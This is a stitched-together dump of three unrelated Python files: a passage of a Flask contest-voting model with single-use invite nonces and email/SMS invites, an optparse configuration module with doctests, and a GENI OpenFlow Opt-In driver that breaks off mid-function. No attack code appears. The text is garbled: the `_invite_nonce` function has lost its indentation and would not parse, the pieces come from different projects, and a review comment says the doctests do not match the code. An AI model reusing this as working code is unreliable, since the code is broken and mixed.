        """Return the contest this nominee belongs to (404 when none)."""
        return E15Contest.query.select_from(pam.BivAccess).filter(
            pam.BivAccess.source_biv_id == E15Contest.biv_id,
            pam.BivAccess.target_biv_id == self.biv_id,
        ).first_or_404()

    def submitter(self):
        """Return the user who submitted this nominee (404 when none)."""
        return pam.User.query.select_from(pam.BivAccess).filter(
            pam.BivAccess.source_biv_id == pam.User.biv_id,
            pam.BivAccess.target_biv_id == self.biv_id,
        ).first_or_404()

    def tally_judge_ranks(self):
        """Score judge ranks: rank 1 earns MAX_RANKS points, and so on."""
        return sum(
            (pcm.JudgeRank.MAX_RANKS + 1) - rank
            for rank in self.get_judge_ranks())

    def tally_votes(self):
        """Count votes: a '1x' vote counts once, a '2x' vote counts twice."""
        weights = {'1x': 1, '2x': 2}
        return sum(weights.get(v.vote_status, 0) for v in self.get_votes())
def _invite_nonce():
# SystemRandom is cryptographically secure
return ''.join(
random.SystemRandom().choice(string.ascii_lowercase) for _ in range(24)
)
class E15VoteAtEvent(db.Model, common.ModelWithDates):
    """An event vote token

    One row per invited voter per contest; invite_nonce is the
    single-use voting-link credential.
    """
    _NONCE_ATTR = 'vote_at_event.invite_nonce'
    biv_id = db.Column(
        db.Numeric(18),
        db.Sequence('e15_vote_at_event_s', start=1019, increment=1000),
        primary_key=True
    )
    contest_biv_id = db.Column(
        db.Numeric(18), db.ForeignKey('e15_contest.biv_id'), nullable=False)
    contest = db.relationship('E15Contest')
    invite_email_or_phone = db.Column(db.String(100), nullable=False)
    # Bit larger than _invite_nonce()
    invite_nonce = db.Column(db.String(32), unique=True, default=_invite_nonce)
    invites_sent = db.Column(db.Integer, nullable=False, default=0)
    nominee_biv_id = db.Column(db.Numeric(18), nullable=True)
    remote_addr = db.Column(db.String(32), nullable=True)
    user_agent = db.Column(db.String(100), nullable=True)
    # Logged in user at the time of vote, may be meaningless
    user_biv_id = db.Column(db.Numeric(18), nullable=True)

    @classmethod
    def create_unless_exists(cls, contest, invite_email_or_phone):
        """Return (record, created) for the contest/invitee pair."""
        query = dict(
            contest_biv_id=contest.biv_id,
            invite_email_or_phone=invite_email_or_phone,
        )
        self = cls.query.filter_by(**query).first()
        if self:
            return self, False
        self = cls(**query)
        ppc.db.session.add(self)
        ppc.db.session.flush()
        # Alias lets the nonce be resolved from a URI path.
        ppc.db.session.add(
            pam.BivAlias(
                biv_id=self.biv_id,
                alias_name=self.invite_nonce,
            ),
        )
        return self, True

    def save_to_session(self):
        """Remember this voter's nonce in the flask session."""
        flask.session[self._NONCE_ATTR] = self.invite_nonce

    def send_invite(self, force):
        """Email or SMS voting link"""
        uri = self.format_absolute_uri()
        # Skip re-sends unless forced, and never exceed the configured cap.
        if (
            self.invites_sent > 0 and not force
            or self.invites_sent >= ppc.app().config['PUBLICPRIZE']['MAX_INVITES_SENT']
        ):
            pp_t('NOT sending to={} uri={}', [self.invite_email_or_phone, uri])
            return None
        pp_cfg = ppc.app().config['PUBLICPRIZE']
        # Bug fix: the assertion message was never formatted, so the
        # offending uri was not shown on failure.
        assert pp_cfg['TEST_MODE'] or not re.search('/localhost|/127', uri), \
            'uri={}: uri contains local host'.format(uri)
        pp_t('to={} uri={}', [self.invite_email_or_phone, uri])
        msg_args = dict(
            contest=self.contest.display_name,
            uri=uri,
        )
        if pp_cfg['MAIL_SUPPRESS_SEND']:
            pp_t('MAIL_SUPPRESS_SEND=True')
        if is_email(self.invite_email_or_phone):
            import flask_mail
            msg = flask_mail.Message(
                subject=_SEND_INVITE_MAIL_SUBJECT.format(**msg_args),
                sender=(self.contest.display_name, pp_cfg['SUPPORT_EMAIL']),
                recipients=[self.invite_email_or_phone],
                body=_SEND_INVITE_MAIL_BODY.format(**msg_args),
            )
            # flask_mail honors MAIL_SUPPRESS_SEND internally.
            ppc.mail().send(msg)
        else:
            import twilio.rest
            cfg = pp_cfg['TWILIO']
            c = twilio.rest.TwilioRestClient(**cfg['auth'])
            sms_args = dict(
                to=self.invite_email_or_phone,
                from_=cfg['from'],
                body=_SEND_INVITE_SMS_BODY.format(**msg_args),
            )
            if not pp_cfg['MAIL_SUPPRESS_SEND']:
                c.sms.messages.create(**sms_args)
        self.invites_sent += 1
        return uri

    @classmethod
    def validate_session(cls, contest):
        """Return (valid, record) for the nonce stored in the session."""
        i = flask.session.get(cls._NONCE_ATTR)
        if not i:
            pp_t('no invite_nonce')
            return False, None
        self = cls.query.filter_by(invite_nonce=i).first()
        if not self:
            pp_t('invite nonce not found, another db?')
            return False, None
        if self.contest_biv_id != contest.biv_id:
            pp_t(
                'nonce={} expect_contest={} actual_contest={}',
                [i, contest.biv_id, self.contest_biv_id],
            )
            return False, None
        return True, self
# Register BIV markers (ids 15, 16, 19) for these model classes.
E15Contest.BIV_MARKER = biv.register_marker(15, E15Contest)
E15Nominee.BIV_MARKER = biv.register_marker(16, E15Nominee)
E15VoteAtEvent.BIV_MARKER = biv.register_marker(19, E15VoteAtEvent)
| |
"""A file-backed declarative layer on optparse.
This module allows the user to register command line options, and to load them
in bulk from a configuration file.
>>> class Config(Configuration):
... debug = BoolOption('Enable debugging.', default=False)
... debug_level = IntOption('Debug level 0 <= n <= 9.', default=0)
... db = URIOption('Database URI.')
>>> config = Config(args=['--debug=true', '--db=mysql://localhost/db'])
>>> config
{'debug': True, 'debug_level': 0, 'db': URI(u'mysql://localhost/db')}
>>> config.debug
True
>>> config.db
URI(u'mysql://localhost/db')
"""
from __future__ import with_statement
import optparse
import sys
from flam.util import to_boolean, to_list, URI
__all__ = ['Configuration', 'Option', 'IntOption', 'FloatOption', 'ListOption',
'BoolOption']
class Option(object):
    """A single declarative configuration option.

    Holds the positional/keyword arguments needed to construct an
    ``optparse.Option`` once the option's flag name is known.
    """

    def __init__(self, help, default=None, *args, **kwargs):
        kwargs['help'] = help
        kwargs['default'] = default
        self.init_kwargs(kwargs)
        self.args = args
        self.kwargs = kwargs

    def init_kwargs(self, kwargs):
        """Hook for initialising keyword arguments to optparse.Option()."""
        if 'action' not in kwargs:
            kwargs['action'] = 'store'

    def to_optparse_option(self, name):
        """Build the ``optparse.Option`` for the flag ``--<name>``."""
        return optparse.Option('--' + name, *self.args, **self.kwargs)
class ConvertingOption(Option):
    """Base class for options whose string value needs type conversion."""

    def convert(self, value):
        """Convert the raw string ``value``; subclasses must override."""
        raise NotImplementedError

    def init_kwargs(self, kwargs):
        def callback(option, opt_str, value, parser):
            # opt_str is '--name'; strip the two dashes to get the dest.
            setattr(parser.values, opt_str[2:], self.convert(value))
        kwargs.update(dict(
            type='string',
            action='callback',
            callback=callback,
        ))
class IntOption(Option):
    """An integer option.

    >>> class Config(Configuration):
    ...     age = IntOption('Age.')
    >>> config = Config(args=['--age=34'])
    >>> config.age
    34
    """

    def init_kwargs(self, kwargs):
        # optparse performs the int conversion itself.
        kwargs.update(type='int')
class FloatOption(Option):
    """A floating point option."""

    def init_kwargs(self, kwargs):
        # optparse performs the float conversion itself.
        kwargs.update(type='float')
class BoolOption(ConvertingOption):
    """A boolean option.

    >>> class Config(Configuration):
    ...     alive = BoolOption('Alive?')
    >>> config = Config(args=['--alive=true'])
    >>> config.alive
    True
    """

    def convert(self, value):
        # Delegates string-to-bool parsing to flam.util.to_boolean.
        return to_boolean(value)
class URIOption(ConvertingOption):
    """A URI option.

    Parsed values are ``flam.util.URI`` instances.

    >>> class Config(Configuration):
    ...     db = URIOption('Database connection.')
    >>> config = Config(args=['--db=mysql://localhost:5001/db'])
    >>> config.db
    URI(u'mysql://localhost:5001/db')
    """

    def convert(self, value):
        return URI(value)
class ListOption(ConvertingOption):
    """An option holding a list of values.

    Accepts extra keywords ``sep`` (separator, default ',') and
    ``keep_empty`` (keep empty items, default False).

    >>> class Config(Configuration):
    ...     names = ListOption('Names.')
    >>> config = Config(args=['--names=bob,alice'])
    >>> config.names
    ['bob', 'alice']
    """

    def __init__(self, *args, **kwargs):
        # Pop our own keywords before the base class sees them.
        self.sep = kwargs.pop('sep', ',')
        self.keep_empty = kwargs.pop('keep_empty', False)
        super(ListOption, self).__init__(*args, **kwargs)

    def convert(self, value):
        return to_list(value, sep=self.sep, keep_empty=self.keep_empty)
class Configuration(object):
    """Configuration container object.

    Configuration options are declared as class attributes. Options can be
    defined in a configuration file or via command line flags.

    NOTE(review): nothing here removes the class-level Option attributes
    or overrides attribute lookup, so ``config.age`` appears to return the
    Option object rather than the parsed value from ``_values`` — the
    module doctests suggest a ``__getattr__``/metaclass existed upstream;
    verify against the original flam package.
    """

    def __init__(self, file=None, args=None, **kwargs):
        """Create a new Configuration object.

        :param file: File-like object or filename to load configuration from.
        :param args: Command-line arguments, excluding argv[0]. sys.argv will
                     be used if omitted.
        :param kwargs: Extra keyword arguments to pass to the OptionParser
                       constructor.
        """
        options = self._collect_options()
        self._parser = optparse.OptionParser(option_list=options, **kwargs)
        # BUG FIX: this method previously referenced the undefined name
        # ``filename`` (NameError on every construction); the parameter is
        # ``file``.  Only a string path is a sensible --config default.
        self._parser.add_option(
            '--config', help='Configuration file to load.',
            default=file if isinstance(file, basestring) else None,
            action='store',
        )
        defaults = dict((option.dest, option.default) for option in options)
        self._values = optparse.Values(defaults)
        if file is not None:
            self.read(file)
        # TODO(alec) We should preserve args somewhere...
        _, args = self._parser.parse_args(args or sys.argv[1:], values=self._values)

    def read(self, file):
        """Read option configuration from a file-like object or a filename.

        >>> class Config(Configuration):
        ...     age = IntOption('Age.')
        >>> from StringIO import StringIO
        >>> conf_file = StringIO('age=10')
        >>> config = Config(conf_file)
        >>> config.age
        10
        """
        file_args = self._read_args(file)
        self._parser.parse_args(file_args, values=self._values)

    def __repr__(self):
        return repr(self._values.__dict__)

    def _collect_options(self):
        """Collect Option/optparse.Option attributes declared on the class."""
        options = []
        for name, value in self.__class__.__dict__.items():
            if isinstance(value, Option):
                value = value.to_optparse_option(name)
            elif isinstance(value, optparse.Option):
                pass
            else:
                continue
            options.append(value)
        return options

    def _read_args(self, file):
        """Parse 'key=value' lines into a ['--key', 'value', ...] arg list.

        Blank lines and '#' comments are skipped.  A filename argument is
        opened here, and the file is always closed.
        """
        args = []
        if isinstance(file, basestring):
            file = open(file)
        try:
            for line in file:
                line = line.strip()
                if not line or line.startswith('#'):
                    continue
                key, value = line.split('=', 1)
                args.append('--' + key.strip())
                args.append(value.strip())
            return args
        finally:
            file.close()
# Run this module's doctests when executed directly.
if __name__ == '__main__':
    import doctest
    doctest.testmod()
| |
from am.rspecs.src.geni.v3.openflow.container.group import Group
from am.rspecs.src.geni.v3.openflow.container.match import Match
from am.rspecs.src.geni.v3.openflow.container.flowspace import FlowSpace
from am.rspecs.src.geni.v3.openflow.container.dpid import DPID
from am.rspecs.src.geni.v3.openflow.container.link import Link
from am.rspecs.src.geni.v3.openflow.container.port import Port
from am.rspecs.src.geni.v3.openflow.container.controller import Controller
from geniutils.src.xrn.xrn import hrn_to_urn
from geniutils.src.xrn.xrn import urn_to_hrn
from openflow.optin_manager.opts.models import Experiment
#from openflow.optin_manager.opts.models import ExperimentFLowSpace
from openflow.optin_manager.opts.models import Reservation
from openflow.optin_manager.opts.models import ReservationFlowSpace
from openflow.optin_manager.opts.models import ExpiringFlowSpaces
from openflow.optin_manager.geni.v3.utils.optin import OptinUtils
from openflow.optin_manager.geni.v3.utils.sliver import SliverUtils
from openflow.optin_manager.geni.v3.utils.flowvisor import FlowVisorWrap
from openflow.optin_manager.xmlrpc_server.models import FVServerProxy
import threading
import copy
import uuid
import traceback
from datetime import datetime
from datetime import timedelta
import dateutil.parser
import re
class OptinDriver:
    """GENIv3 driver for the OpenFlow Opt-In manager.

    Maps GENI AM operations (describe/allocate/provision/renew/status/
    delete) onto the Opt-In manager's Django models (Reservation,
    Experiment, ExpiringFlowSpaces) and the FlowVisor proxy.
    """

    def __init__(self):
        self.__geni_best_effort_mode = True
        self.__mutex = threading.Lock()
        # GENI allocation states
        self.GENI_ALLOCATED = "geni_allocated"
        self.GENI_UNALLOCATED = "geni_unallocated"
        self.GENI_PROVISIONED = "geni_provisioned"
        # GENI operational states
        self.GENI_READY = "geni_ready"
        self.GENI_NOT_READY = "geni_notready"
        self.GENI_CONFIGURING = "geni_configuring"
        self.GENI_FAILED = "geni_failed"
        self.PENDING_OF_PROVISION = "Pending of Provisioning"
        # NOTE(review): attribute keeps its historical typo ("PENDINF")
        # so external users of this constant do not break.
        self.PENDINF_OF_APPROVAL = "Pending of Approval"
        self.__config = None
        self.__sliver_manager = SliverUtils

    def get_version(self):
        """Return the GetVersion payload (currently only the CM URN)."""
        #TODO Add F4F Extensions
        #TODO Add FELIX Extesions, if any
        return {"urn": self.__generate_component_manager_id()}

    def get_specific_devices(self, urn, geni_available=True):
        """Describe the sliver derived from slice ``urn`` (GENI Describe)."""
        try:
            urn = self.__generate_sliver_urn_from_slice_urn(urn)
            return self.__convert_to_resource(urn)
        except:
            traceback.print_exc()

    def __get_specific_devices(self, urn, geni_available=True):
        """Build a FlowSpace for ``urn`` straight from FlowVisor data.

        BUG FIX: the original indexed entries with the undefined name
        ``dpid`` (NameError), wrote into a per-datapath dict before
        creating it (KeyError), mixed the keys "match"/"matches", and
        never returned the result.  Assumes each FlowVisor entry carries
        a "dpid" key — TODO confirm against
        FlowVisorWrap.flow_space_by_slice().
        """
        fv_wrap = FlowVisorWrap()
        fspaces = fv_wrap.flow_space_by_slice(urn)
        formatted_fs = dict()
        for fs in fspaces:
            entry = formatted_fs.setdefault(
                fs["dpid"], {"ports": [], "matches": []})
            if fs["match"]["in_port"] not in entry["ports"]:
                entry["ports"].append(fs["match"]["in_port"])
            if fs["match"]["headers"] not in entry["matches"]:
                entry["matches"].append(fs["match"]["headers"])
        return self.__flowvisor_fs_to_instance(formatted_fs)

    def __flowvisor_fs_to_instance(self, fs_dict):
        """Convert {datapath: {"ports": [...], "matches": [...]}} to a FlowSpace."""
        flowspace = FlowSpace()
        group = Group()
        for datapath in fs_dict.keys():
            dpid = DPID()
            dpid.datapath = datapath
            for port in fs_dict[datapath]["ports"]:
                of_port = Port()
                of_port.set_num(port)
                dpid.add_port(of_port)
            group.add_dpid(dpid)
            for match in fs_dict[datapath]["matches"]:
                of_match = Match()
                if "dl_vlan" in match:
                    of_match.add_dl_vlan(match["dl_vlan"])
                group.add_match(of_match)
        flowspace.set_group(group)
        return flowspace

    def get_all_devices(self, geni_available=True):
        """List every switch and link known to FlowVisor."""
        devices = list()
        devices.extend(self.__get_switches())
        devices.extend(self.__get_links())
        return devices

    def create_flowspace(self, urn, expiration=None, users=list(), geni_best_effort=True):
        """Provision a previously allocated sliver (GENI Provision).

        The Reservation is consumed: its flowspaces are handed to the
        sliver manager, an ExpiringFlowSpaces row records the expiration,
        and the reservation rows are deleted once the manifest is built.
        """
        try:
            urn = self.__generate_sliver_urn_from_slice_urn(urn)
            params = self.__urn_to_fs_params(urn)
            res = Reservation.objects.filter(**params)
            if not res:
                raise Exception("Sliver not found or already allocated")
            res = res[0]
            rfs = res.reservationflowspace_set.all()
            slivers = self.__get_create_slice_params(rfs)
            self.__sliver_manager.create_of_sliver(
                urn, res.project_name, res.project_desc, res.slice_name,
                res.slice_desc, res.controller_url, res.owner_email,
                res.owner_password, slivers)
            ExpiringFlowSpaces(slice_urn=urn, expiration=expiration).save()
            manifest = self.__convert_to_resource(urn, expiration)
            # The reservation is consumed by provisioning.
            rfs.delete()
            res.delete()
        except Exception as e:
            traceback.print_exc()
            raise e
        return manifest

    def reserve_flowspace(self, slice_urn, reservation, expiration=None, users=list()):
        """Allocate a sliver (GENI Allocate) by storing Reservation rows."""
        try:
            if not expiration:
                expiration = datetime.utcnow() + timedelta(hours=1)
            reservation_params = self.__get_experiment_params(reservation, slice_urn)
            # Delete first any other reservation by this name; slice_id is
            # removed from the filter because it changes every allocation.
            reservation_params_filter = copy.deepcopy(reservation_params)
            reservation_params_filter.pop("slice_id")
            Reservation.objects.filter(**reservation_params_filter).delete()
            r = Reservation(**reservation_params)
            r.expiration = expiration
            r.save()
            for group in reservation.get_groups():
                # Keep only resources served by this Component Manager ID.
                for dpid in group.get_dpids():
                    # URNs of foreign RMs are not served.
                    current_cm_urn = self.__config.CM_HRN.replace(".", ":")
                    cm_id = getattr(dpid, "get_component_manager_id")
                    if callable(cm_id):
                        cm_id = cm_id()
                    # If this DPID does not belong to this facility, skip.
                    if current_cm_urn not in cm_id:
                        continue
                    for port in dpid.get_ports():
                        for match in group.get_matches():
                            req_params = self.__translate_to_flow_space_model(match, dpid, port)
                            for param in req_params:
                                param = self.__format_params_to_reservation_model(param)
                                reservation_flowspace = ReservationFlowSpace(**param)
                                reservation_flowspace.dpid = dpid.get_datapath()
                                reservation_flowspace.res = r
                                reservation_flowspace.expiration = expiration
                                reservation_flowspace.slice_urn = slice_urn
                                reservation_flowspace.save()
        except Exception as e:
            traceback.print_exc()
            raise e
        reservation.set_urn(reservation_params["slice_urn"])
        # NOTE(review): differs from self.PENDING_OF_PROVISION
        # ("Pending of Provisioning"); kept verbatim for compatibility.
        reservation.set_state("Pending of Provision")
        reservation.set_expiration(expiration)
        reservation.set_allocation_status(self.GENI_ALLOCATED)
        reservation.set_operational_status(self.GENI_NOT_READY)
        return reservation

    def renew_fs(self, urn, expiration):
        """Renew a sliver's expiration (GENI Renew).

        Provisioned slivers are tracked by ExpiringFlowSpaces, slivers
        that are only allocated by Reservation.  Like the original
        loop-with-return, only the first matching row is updated.
        """
        urn = self.__generate_sliver_urn_from_slice_urn(urn)
        flowspaces = ExpiringFlowSpaces.objects.filter(slice_urn=urn)
        if flowspaces:
            flowspace = flowspaces[0]
            flowspace.expiration = expiration
            flowspace.save()
            return self.__convert_to_resource(urn, expiration)
        reservations = Reservation.objects.filter(slice_urn=urn)
        if reservations:
            reservation = reservations[0]
            reservation.expiration = expiration
            reservation.save()
            return self.__convert_to_resource(urn, expiration)
        raise Exception("Sliver not Found")

    def start_flow_space(self, urn):
        """Opt the sliver in (operational action 'start')."""
        return self.__crud_flow_space(urn, "start")

    def stop_flow_space(self, urn):
        """Opt the sliver out (operational action 'stop')."""
        return self.__crud_flow_space(urn, "stop")

    def reboot_flow_space(self, urn):
        """Re-opt the sliver in (operational action 'reboot')."""
        return self.__crud_flow_space(urn, "reboot")

    def delete_flow_space(self, urn):
        """Delete the sliver (GENI Delete)."""
        return self.__crud_flow_space(urn, "delete")

    def get_geni_best_effort_mode(self):
        return self.__geni_best_effort_mode

    def set_geni_best_effort_mode(self, value):
        self.__geni_best_effort_mode = value

    def __crud_flow_space(self, urn, action):
        """PerformOperationalAction-related logic."""
        try:
            urn = self.__generate_sliver_urn_from_slice_urn(urn)
            slivers = self.__convert_to_resource(urn)
            prov_status, alloc_status = self.__get_geni_status(urn)
            # Special case: deleting an allocated (not provisioned) sliver.
            if alloc_status == self.GENI_ALLOCATED and action == "delete":
                reservations = Reservation.objects.filter(slice_urn=urn)
                for res in reservations:
                    rfs = res.reservationflowspace_set.all()
                    rfs.delete()
                    res.delete()
                efs = ExpiringFlowSpaces.objects.filter(slice_urn=urn)
                efs.delete()
                # Needed for coherent output
                slivers.set_operational_status(self.GENI_NOT_READY)
                slivers.set_allocation_status(self.GENI_UNALLOCATED)
                return slivers
            if not alloc_status == self.GENI_PROVISIONED:
                raise Exception("Operational Actions can be only performed to provisioned slivers")
            if action == "delete":
                efs = ExpiringFlowSpaces.objects.filter(slice_urn=urn)
                efs.delete()
                self.__sliver_manager.delete_of_sliver(urn)
                slivers.set_operational_status(self.GENI_NOT_READY)
                slivers.set_allocation_status(self.GENI_UNALLOCATED)
            elif action == "start" or action == "reboot":
                if not prov_status in [self.GENI_READY, self.GENI_CONFIGURING]:
                    self.__sliver_manager.opt_in(urn)
                prov_status, alloc_status = self.__get_geni_status(urn)
                slivers.set_operational_status(prov_status)
                slivers.set_allocation_status(alloc_status)
            elif action == "stop":
                self.__sliver_manager.opt_out(urn)
                slivers.set_operational_status(self.GENI_NOT_READY)
                slivers.set_allocation_status(self.GENI_PROVISIONED)
            # BUG FIX: after "delete" the ExpiringFlowSpaces rows are gone,
            # so unconditionally indexing [0] raised IndexError; guard it.
            expiring_qs = ExpiringFlowSpaces.objects.filter(slice_urn=urn)
            if expiring_qs and prov_status == self.GENI_READY:
                expiring_fs = expiring_qs[0]
                expiring_fs.was_granted = True
                expiring_fs.save()
            return slivers
        except Exception as e:
            traceback.print_exc()
            raise e

    def __convert_to_resource(self, urn, expiration=None):
        """Build the FlowSpace manifest for an Experiment or Reservation."""
        sliver_urn = self.__generate_sliver_urn_from_slice_urn(urn)
        exps = Experiment.objects.filter(slice_urn=urn)
        if expiration:
            expiration = str(expiration)
        if exps:
            experiment = exps[0]
            if not expiration:
                try:
                    expiration = ExpiringFlowSpaces.objects.filter(slice_urn=experiment.slice_urn)[0].expiration
                except:
                    raise Exception("Could not find appropriate FlowSpace expiration")
            efs = experiment.experimentflowspace_set.all()
            return self.__parse_to_fs_object(urn, experiment, efs, expiration)
        elif Reservation.objects.filter(slice_urn=urn):
            reservation = Reservation.objects.filter(slice_urn=sliver_urn)[0]
            if not expiration:
                expiration = reservation.expiration
            efs = reservation.reservationflowspace_set.all()
            return self.__parse_to_fs_object(sliver_urn, reservation, efs, expiration, slice_urn=urn)
        return None

    def __parse_to_fs_object(self, urn=None, experiment=None, exp_flowspace=None, expiration=None, slice_urn=None):
        """Populate a FlowSpace container from an Experiment/Reservation row."""
        flowspace = FlowSpace()
        flowspace.set_description(experiment.slice_desc)
        flowspace.set_urn(urn)
        flowspace.set_email(str(experiment.owner_email))
        flowspace.set_slice_urn(urn)  # slice_urn == urn (optin)
        flowspace.set_state(self.GENI_NOT_READY)
        provisioning_status, allocation_status = self.__get_geni_status(urn)
        flowspace.set_allocation_status(allocation_status)
        flowspace.set_operational_status(provisioning_status)
        flowspace.set_expiration(expiration)
        controller = Controller()
        controller.parse_url(experiment.controller_url)
        flowspace.set_controller(controller)
        return flowspace

    def __get_geni_status(self, urn):
        """Return (operational, allocation) GENI status for ``urn``.

        An Experiment row means provisioned (ready once a UserOpts row
        exists, i.e. the user opted in); a Reservation row means
        allocated only.

        NOTE(review): the class originally defined this method twice;
        only this (later) definition was ever in effect, so the shadowed
        first copy — which also misspelled 'experimentflowspace_set' —
        was removed.
        """
        exps = Experiment.objects.filter(slice_urn=urn)
        if exps:
            opts = exps[0].useropts_set.all()
            if opts:
                return self.GENI_READY, self.GENI_PROVISIONED
            else:
                return self.GENI_NOT_READY, self.GENI_PROVISIONED
        res = Reservation.objects.filter(slice_urn=urn)
        if res:
            return self.GENI_NOT_READY, self.GENI_ALLOCATED
        raise Exception("Slice Does Not Exist")

    def __get_switches(self):
        """Fetch the switch list from the first configured FlowVisor proxy."""
        fv = FVServerProxy.objects.all()[0]
        switches = fv.get_switches()
        return self.__parse_to_switches(switches)

    def __get_links(self):
        """Fetch the link list from the first configured FlowVisor proxy."""
        fv = FVServerProxy.objects.all()[0]
        links = fv.get_links()
        return self.__parse_to_links(links)

    def __parse_to_switches(self, switches):
        """Turn (datapath, port-info) pairs into DPID containers."""
        dpids = list()
        for switch in switches:
            dpid = DPID()
            dpid.set_datapath(switch[0])
            dpid.set_ports(self.__parse_to_ports(switch[1]))
            dpid.set_component_manager_id(self.__generate_component_manager_id(dpid))
            dpid.set_component_id(self.__generate_dpid_component_id(dpid))
            dpid.set_type("Device")
            dpids.append(dpid)
        return dpids

    def __parse_to_ports(self, ports):
        """Parse 'name(num), name(num), ...' from ports["portNames"]."""
        port_list = ports["portNames"].split(',')
        dpid_ports = list()
        for port in port_list:
            dpid_port = Port()
            match = re.match(r'[\s]*(.*)\((.*)\)', port)
            dpid_port.set_name(match.group(1))
            dpid_port.set_num(match.group(2))
            dpid_ports.append(dpid_port)
        return dpid_ports

    def __parse_to_links(self, links):
        """Turn (src_dpid, src_port, dst_dpid, dst_port) tuples into Links."""
        dpid_links = list()
        for link in links:
            src_dpid = DPID()
            src_port = Port()
            src_port.set_num(link[1])
            src_dpid.add_port(src_port)
            src_dpid.set_datapath(link[0])
            src_dpid.set_component_id(self.__generate_dpid_component_id(src_dpid))
            src_dpid.set_component_manager_id(self.__generate_component_manager_id(src_dpid))
            dst_dpid = DPID()
            dst_port = Port()
            dst_port.set_num(link[3])
            dst_dpid.add_port(dst_port)
            dst_dpid.set_datapath(link[2])
            dst_dpid.set_component_id(self.__generate_dpid_component_id(dst_dpid))
            dst_dpid.set_component_manager_id(self.__generate_component_manager_id(dst_dpid))
            link = Link()
            link.set_src_dpid(src_dpid)
            link.set_dst_dpid(dst_dpid)
            link.set_src_port(src_port)
            link.set_dst_port(dst_port)
            link.set_type("Link")
            link.set_component_id(self.__generate_link_component_id(link))
            dpid_links.append(link)
        return dpid_links

    # URN helpers

    def __generate_component_manager_id(self, server=None):
        hrn = "openflow." + self.__config.CM_HRN
        return hrn_to_urn(hrn, "authority+cm")

    def __generate_component_manager_name(self, server):
        hrn = "openflow." + self.__config.CM_HRN
        return hrn_to_urn(hrn, "authority+cm")

    def __generate_dpid_component_id(self, dpid):
        hrn = "openflow." + self.__config.CM_HRN + "." + str(dpid.get_datapath())
        return hrn_to_urn(hrn, "datapath")

    def __generate_dpid_component_name(self, dpid):
        hrn = "openflow." + self.__config.CM_HRN + "." + str(dpid.get_datapath())
        return hrn_to_urn(hrn, "datapath")

    def __generate_link_component_id(self, link):
        hrn = self.__config.CM_HRN.replace(".", ":")
        return "urn:publicid:IDN+openflow:%s+link+%s_%s_%s_%s" % (hrn, str(link.get_src_dpid().get_datapath()), str(link.get_src_port().get_num()), str(link.get_dst_dpid().get_datapath()), str(link.get_dst_port().get_num()))

    def __generate_sliver_urn(self, vm):
        return hrn_to_urn(self.__config.CM_HRN + "." + str(vm.id), "sliver")

    def __select_sliver_expiration(self, user_expiration, slice_expiration=None, **kwargs):
        """Return min(user expiration, slice expiration), ISO-8601 'Z' form."""
        if not slice_expiration:
            # BUG FIX: only dateutil.parser is imported at module level,
            # so dateutil.tz was not guaranteed to be available here.
            from dateutil import tz as dateutil_tz
            current_time = datetime.utcnow()
            if "extension_timedelta" in kwargs:
                extension_timedelta = kwargs["extension_timedelta"]
            else:
                extension_timedelta = {"days": 31}  # Default: one month
            slice_expiration = current_time + timedelta(**extension_timedelta)
            slice_expiration = slice_expiration.replace(tzinfo=dateutil_tz.tzutc()).strftime("%Y-%m-%d %H:%M:%S")
            slice_expiration = slice_expiration.replace(" ", "T") + "Z"
        # Retrieve expiration = minimum ( user expiration, slice expiration )
        extended_expiration = min(user_expiration, slice_expiration)
        return extended_expiration

    def __get_slice_expiration(self, expiration=None):
        """Normalize ``expiration`` to 'YYYY-MM-DDTHH:MM:SSZ'.

        NOTE(review): this returns max(requested, now+31d), i.e. at least
        one month out; if the intent was to *cap* at one month, min()
        should be used.  Behavior kept as-is.
        """
        max_exp = datetime.utcnow() + timedelta(days=31)
        if expiration:
            expiration = expiration.replace("T", " ")
            expiration = expiration.replace("Z", "")
            try:
                expiration = datetime.strptime(str(expiration), "%Y-%m-%d %H:%M:%S.%f")
            except:
                expiration = datetime.strptime(str(expiration), "%Y-%m-%d %H:%M:%S")
            selected = str(max(expiration, max_exp))
            return selected.replace(" ", "T") + "Z"
        return str(max_exp).replace(" ", "T") + "Z"

    def __get_experiment_params(self, fs, slice_urn=None, extra_params=dict()):
        """Map a requested FlowSpace onto Reservation/Experiment fields.

        ``extra_params`` is currently unused.
        """
        experiment_params = dict()
        experiment_params['slice_desc'] = fs.get_description()
        experiment_params['controller_url'] = fs.get_controller().get_url()
        experiment_params['owner_email'] = fs.get_email()
        experiment_params['project_desc'] = fs.get_description()
        experiment_params['project_name'] = slice_urn
        experiment_params['slice_name'] = slice_urn
        experiment_params['slice_urn'] = self.__generate_sliver_urn_from_slice_urn(slice_urn)
        experiment_params['slice_id'] = uuid.uuid4()
        return experiment_params

    def __generate_sliver_urn_from_slice_urn(self, slice_urn):
        """Derive this CM's sliver URN from the leaf of a slice URN."""
        hrn, urn_type = urn_to_hrn(slice_urn)
        leaf = hrn.split(".")[-1]
        return hrn_to_urn(self.__config.CM_HRN + "." + str(leaf), "sliver")

    def __urn_to_fs_params(self, urn):
        """Choose the Reservation filter keyed by the URN's type.

        Returns None for URN types other than 'sliver'/'slice'.
        """
        hrn, urn_type = urn_to_hrn(urn)
        if urn_type == "sliver":
            return {"slice_urn": urn}
        elif urn_type == "slice":
            return {"project_name": urn}

    def __translate_to_flow_space_model(self, match, dpid, port, model=None):
        fs = OptinUtils.format_flowspaces(match, port.get_num())
        return fs

    def __get_create_slice_params(self, rfs):
        """Group reservation flowspaces by datapath for create_of_sliver()."""
        slivers = dict()
        for rf in rfs:
            if rf.dpid in slivers.keys():
                slivers[rf.dpid].append(self.__get_flow_space_info(rf))
            else:
                slivers[rf.dpid] = [self.__get_flow_space_info(rf)]
        output = list()
        for dpid in slivers.keys():
            output.append({"datapath_id": dpid, "flowspace": slivers[dpid]})
        return output

    def __get_flow_space_info(self, rf):
        """Model row -> FlowVisor-style flowspace dict."""
        fs = {'dl_dst_end': rf.mac_dst_e,
              'dl_dst_start': rf.mac_dst_s,
              'dl_src_end': rf.mac_src_e,
              'dl_src_start': rf.mac_src_s,
              'dl_type_end': rf.eth_type_e,
              'dl_type_start': rf.eth_type_s,
              'id': rf.id,
              'nw_dst_end': rf.ip_dst_e,
              'nw_dst_start': rf.ip_dst_s,
              'nw_proto_end': rf.ip_proto_e,
              'nw_proto_start': rf.ip_proto_s,
              'nw_src_end': rf.ip_src_e,
              'nw_src_start': rf.ip_src_s,
              'port_num_end': rf.port_number_e,
              'port_num_start': rf.port_number_s,
              'tp_dst_end': rf.tp_dst_e,
              'tp_dst_start': rf.tp_dst_s,
              'tp_src_end': rf.tp_src_e,
